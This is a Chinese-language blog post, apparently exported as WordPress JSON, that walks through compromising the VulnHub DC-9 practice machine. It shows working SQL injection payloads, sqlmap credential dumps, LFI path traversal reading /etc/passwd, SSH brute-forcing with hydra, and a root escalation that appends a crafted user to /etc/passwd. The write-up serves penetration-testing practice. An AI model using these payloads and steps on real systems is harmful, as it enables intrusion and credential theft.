\u9019\u662fVulnHub \u5e73\u53f0\u7684\u4e00\u500b\u7528\u65bc\u7df4\u7fd2\u6ef2\u900f\u6e2c\u8a66\u548c\u6f0f\u6d1e\u5229\u7528\u7684\u9776\u6a5f\uff0c\u76ee\u6a19\u662f\u8b93\u6ef2\u900f\u6e2c\u8a66\u4eba\u54e1\u935b\u7df4\u60c5\u8cc7\u641c\u96c6\u3001SQL injection\u3001Local File Injection\u3001\u7206\u7834\u6280\u5de7\u53ca\u6b0a\u9650\u63d0\u5347\u7684\u6280\u80fd\u3002\u8a72\u9776\u6a5f\u6ef2\u900f\u505a\u6cd5\u5982\u4e0b<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u4f7f\u7528nmap \u767c\u73fe80port \u548c22Port<\/p>\n\n\n\n
# nmap dc9\nPORT STATE SERVICE VERSION\n22\/tcp filtered ssh\n80\/tcp open http Apache httpd 2.4.38 ((Debian))<\/code><\/pre>\n\n\n\nport22\u51fa\u73fefiltered\u8868\u793a\u53ef\u80fd\u4f7f\u7528Port Knocking\u65b9\u6cd5<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u7528SQL injection\u53d6\u5f97\u7db2\u9801\u7ba1\u7406\u54e1\u6b0a\u9650<\/h2>\n\n\n\n
\u8a2a\u554f\u7db2\u9801\uff0c\u5206\u6790search.php\u6642\u767c\u73fe\u6709sqli\u7684\u6f0f\u6d1e<\/p>\n\n\n\n
\u56e0\u70ba\u641c\u5c0b' or '1'='1<\/code>\u6642\u6703\u8fd4\u56de\u6240\u6709\u8a18\u9304<\/p>\n\n\n\n<\/p>\n\n\n\n
\u5c07\u4ee5\u4e0b\u8acb\u6c42\u5132\u5b58\u6210search.request<\/p>\n\n\n\n
POST \/results.php HTTP\/1.1\nHost: 192.168.1.7\nContent-Length: 11\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/192.168.1.7\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.5481.78 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7\nReferer: http:\/\/192.168.1.7\/search.php\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nsearch=joey<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u4f7f\u7528sqlmap\u6307\u4ee4\u5982\u4e0b\uff0c\u767c\u73fe\u53efinjectable<\/p>\n\n\n\n
sqlmap -r search.request<\/code><\/p>\n\n\n\n<\/p>\n\n\n\n
\u900f\u904esqlmap\u770busers\u5e33\u5bc6<\/p>\n\n\n\n
# sqlmap -r search_form.txt --dump -D Staff -T Users \n...omit... \nDatabase: Staff\nTable: Users\n[1 entry]\n+--------+----------------------------------+----------+\n| UserID | Password | Username |\n+--------+----------------------------------+----------+\n| 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin |\n+--------+----------------------------------+----------+<\/code><\/pre>\n\n\n\n\u5bc6\u78bc\u662fmd5\u683c\u5f0f\uff0c\u53ef\u4ee5\u7528\u4e00\u4e9b\u7dda\u4e0a\u5de5\u5177\u7206\u7834\uff0c\u4f8b\u5982https:\/\/crackstation.net\/<\/p>\n\n\n\n
\u7206\u7834\u5f8c\u5f97\u5230\u5bc6\u78bc transorbital1<\/p>\n\n\n\n
\u4f7f\u7528admin\u5e33\u865f\u548c\u5bc6\u78bc\u53ef\u6210\u529f\u767b\u5165<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u7528Local File Injection\u53d6\u5f97\u7cfb\u7d71\u654f\u611f\u4fe1\u606f<\/h2>\n\n\n\n
\u767b\u5165\u5f8c\u767c\u73fe\u7db2\u9801\u4e0b\u65b9\u6709\u500b File does not exist<\/code><\/p>\n\n\n\n\u6709\u4e00\u500b\u53c3\u6578\u70bafile= \uff0c\u9019\u88e1\u6709\u4e00\u500bLocal File Injection (LFI)\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u4f7f\u7528\u4ee5\u4e0b\u53d6\u5f97\u6a94\u6848\u5167\u5bb9<\/p>\n\n\n\n
http:\/\/dc9\/manage.php?file=..\/..\/..\/..\/..\/..\/..\/etc\/passwd<\/code><\/p>\n\n\n\n\u6e2c\u8a66etc\/knockd.conf<\/code>\u4e5f\u53ef\u6210\u529f<\/p>\n\n\n\nhttp:\/\/dc9\/welcome.php?file=..\/..\/..\/..\/..\/..\/..\/..\/etc\/knockd.conf<\/code><\/p>\n\n\n\n\u5167\u5bb9\u986f\u793a\u5982\u4e0b<\/p>\n\n\n\n
[openSSH]\n sequence = 7469,8475,9842\n seq_timeout = 25\n command = \/sbin\/iptables -I INPUT -s %IP% -p tcp - dport 22 -j ACCEPT\n tcpflags = syn\n\n[closeSSH]\n sequence = 9842,8475,7469\n seq_timeout = 25\n command = \/sbin\/iptables -D INPUT -s %IP% -p tcp - dport 22 -j ACCEPT\n tcpflags = syn<\/code><\/pre>\n\n\n\n\u4f7f\u7528nc\u5617\u8a66\u5b58\u53d6\u76ee\u6a197469,8475,9842\uff0c\u6700\u5f8c\u5728\u6e2c\u8a66port 22\u53ef\u4ee5\u767c\u73fe\u5df1\u7d93\u6253\u958b<\/p>\n\n\n\n
$ nc -v dc9 7469\n10.0.0.14: inverse host lookup failed: Unknown host\n(UNKNOWN) [10.0.0.14] 7469 (?) : Connection refused\n\n$ nc -v dc9 8475 \n10.0.0.14: inverse host lookup failed: Unknown host\n(UNKNOWN) [10.0.0.14] 8475 (?) : Connection refused\n\n$ nc -v dc9 9842 \n10.0.0.14: inverse host lookup failed: Unknown host\n(UNKNOWN) [10.0.0.14] 9842 (?) : Connection refused\n\n$ nc -v dc9 22 \n10.0.0.14: inverse host lookup failed: Unknown host\n(UNKNOWN) [10.0.0.14] 22 (ssh) open\nSSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u1<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u7834\u89e3SSH\u5e33\u5bc6<\/h2>\n\n\n\n
\u4f7f\u7528sqlmap\u628a\u53ef\u80fd\u7684username\u548cpassword\u5217\u51fa\u4f86<\/p>\n\n\n\n
$ sqlmap -r search_form.txt --dump -D users -T UserDetails
...omit...
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+<\/pre>\n\n\n\n\u5c07username\u5132\u5b58\u5728usernames.txt\uff0c\u5c07passowrd\u5132\u5b58\u5728passwords.txt \uff0c\u7136\u5f8c\u4f7f\u7528hydra\u6e2c\u8a66ssh\u7684\u5bc6\u78bc<\/p>\n\n\n\n
$ hydra -L usernames.txt -P passwords.txt dc9 ssh\n[DATA] attacking ssh:\/\/dc9:22\/\n[22][ssh] host: dc9 login: chandlerb password: UrAG0D!\n[22][ssh] host: dc9 login: joeyt password: Passw0rd\n[22][ssh] host: dc9 login: janitor password: Ilovepeepee\n1 of 1 target successfully completed, 3 valid passwords found<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u4f7f\u7528janitor\u767b\u5165 <\/p>\n\n\n\n
$ ssh janitor@dc9\njanitor@dc-9:~$ ls -la\ntotal 16\ndrwx------ 4 janitor janitor 4096 Jan 21 07:41 .\ndrwxr-xr-x 19 root root 4096 Dec 29 2019 ..\nlrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> \/dev\/null\ndrwx------ 3 janitor janitor 4096 Jan 21 07:41 .gnupg\ndrwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin\n\njanitor@dc-9:~$ cd .secrets-for-putin\/\n\njanitor@dc-9:~\/.secrets-for-putin$ ls -la\ntotal 12\ndrwx------ 2 janitor janitor 4096 Dec 29 2019 .\ndrwx------ 4 janitor janitor 4096 Jan 21 07:41 ..\n-rwx------ 1 janitor janitor 66 Dec 29 2019 passwords-found-on-post-it-notes.txt\n\njanitor@dc-9:~\/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt \nBamBam01\nPassw0rd\nsmellycats\nP0Lic#10-4\nB4-Tru3-001\n4uGU5T-NiGHts<\/code><\/pre>\n\n\n\n\u5c07passwords-found-on-post-it-notes.txt\u5167\u5bb9\u8907\u5236\u904e\u4f86\uff0c\u4e26\u4f7f\u7528hydra\u6e2c\u8a66\u767c\u73fe\u53c8\u67092\u7d44\u5e33\u5bc6\u53ef\u7528<\/p>\n\n\n\n
$ hydra -L usernames.txt -P passwords-found-on-post-it-notes.txt dc9 ssh \n...\n[DATA] attacking ssh:\/\/dc9:22\/\n[22][ssh] host: dc9 login: joeyt password: Passw0rd\n[22][ssh] host: dc9 login: fredf password: B4-Tru3-001\n1 of 1 target successfully completed, 2 valid passwords found<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
Privilege Escalation<\/h2>\n\n\n\n
\u4f7f\u7528fredf\u767b\u5165 , \u7528sudo -l\u767c\u73fe\/opt\/devstuff\/dist\/test\/test<\/code>\u6709\u9ad8\u6b0a\u9650<\/p>\n\n\n\n$ sudo -l\nMatching Defaults entries for fredf on dc-9:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser fredf may run the following commands on dc-9:\n (root) NOPASSWD: \/opt\/devstuff\/dist\/test\/test\n\n$ cd \/opt\/devstuff\/dist\/test\n\/opt\/devstuff\/dist\/test$ .\/test\nUsage: python test.py read append\n\n\/opt\/devstuff\/dist\/test$ find \/ -name \"test.py\" -type f 2>\/dev\/null\n\/opt\/devstuff\/test.py\n\/usr\/lib\/python3\/dist-packages\/setuptools\/command\/test.py<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u6a94\u6848\/opt\/devstuff\/test.py\u5167\u5bb9\u5982\u4e0b\uff0c\u529f\u80fd\u662f\u53ef\u4ee5\u5c07\u7b2c\u4e00\u500b\u6307\u5b9a\u6a94\u6848\u5167\u5bb9\u653e\u5728\u7b2c\u4e8c\u500b\u6307\u5b9a\u6a94\u6848\u7684\u5f8c\u9762<\/p>\n\n\n\n
#!\/usr\/bin\/python\n\nimport sys\n\nif len (sys.argv) != 3 :\n print (\"Usage: python test.py read append\")\n sys.exit (1)\n\nelse :\n f = open(sys.argv[1], \"r\")\n output = (f.read())\n\n f = open(sys.argv[2], \"a\")\n f.write(output)\n f.close()<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u5148\u5728\u653b\u64ca\u6a5f\u88fd\u505a\u4e00\u500b\u5bc6\u78bc\u52a0\u5bc6\u5b57\u4e32<\/p>\n\n\n\n
# openssl passwd -1 -salt salt password123\n$1$salt$\/3NHsNrNmNbOO90IOW9dw\/<\/code><\/pre>\n\n\n\n\u5728\u6839\u64da\/etc\/passwd\u683c\u5f0f\u88fd\u4f5c\u4e00\u500b\u65b0\u4f7f\u7528\u8005g0tmarks\u7684\u5b57\u4e32\uff0c\u4e26\u5b58\u5728\/tmp\/user.txt<\/p>\n\n\n\n
$ echo 'g0tmarks:$1$salt$\/3NHsNrNmNbOO90IOW9dw\/:0:0::\/root:\/bin\/bash' > \/tmp\/user.txt\n$ cat \/tmp\/user.txt\ng0tmarks:$1$salt$\/3NHsNrNmNbOO90IOW9dw\/:0:0::\/root:\/bin\/bash<\/code><\/pre>\n\n\n\n\u7136\u5f8c\u900f\u904e\/opt\/devstuff\/dist\/test\/test\u5c07\/tmp\/user.txt\u5167\u5bb9\u9644\u52a0\u5728\/etc\/passwd\u5f8c\u9762<\/p>\n\n\n\n
$ sudo \/opt\/devstuff\/dist\/test\/test \/tmp\/user.txt \/etc\/passwd\n$ tail \/etc\/passwd\n...omit...\ng0tmarks:$1$salt$\/3NHsNrNmNbOO90IOW9dw\/:0:0::\/root:\/bin\/bash \n$ su g0tmarks\n# cat theflag.txt<\/code><\/pre>\n\n\n\n\u6210\u529f\u5f8c\u53ef\u7528\u65b0\u4f7f\u7528\u8005\u5e33\u865f\u767b\u5165\uff0c\u5c31\u80fd\u986f\u793atheflag.txt\u5167\u5bb9<\/p>\n\n\n\n
<\/p>\n\n\n\n
refer
https:\/\/hummus-ful.github.io\/vulnhub\/2021\/01\/22\/DC-9.html<\/a>
https:\/\/systemweakness.com\/vlunhub-dc-9-a80d55b27d0a<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"\u9019\u662fVulnHub \u5e73\u53f0\u7684\u4e00\u500b\u7528\u65bc\u7df4\u7fd2\u6ef2\u900f\u6e2c\u8a66\u548c\u6f0f\u6d1e\u5229\u7528\u7684\u9776\u6a5f\uff0c\u76ee\u6a19\u662f\u8b93\u6ef2\u900f\u6e2c\u8a66\u4eba\u54e1\u935b\u7df4\u60c5\u8cc7\u641c\u96c6\u3001SQL injection\u3001Local File Injection\u3001\u7206\u7834\u6280\u5de7\u53ca\u6b0a\u9650\u63d0\u5347\u7684\u6280\u80fd\u3002<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[27],"tags":[],"class_list":["post-1901","post","type-post","status-publish","format-standard","hentry","category-hackerskill"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1901","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1901"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1901\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1901"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1901"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1901"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}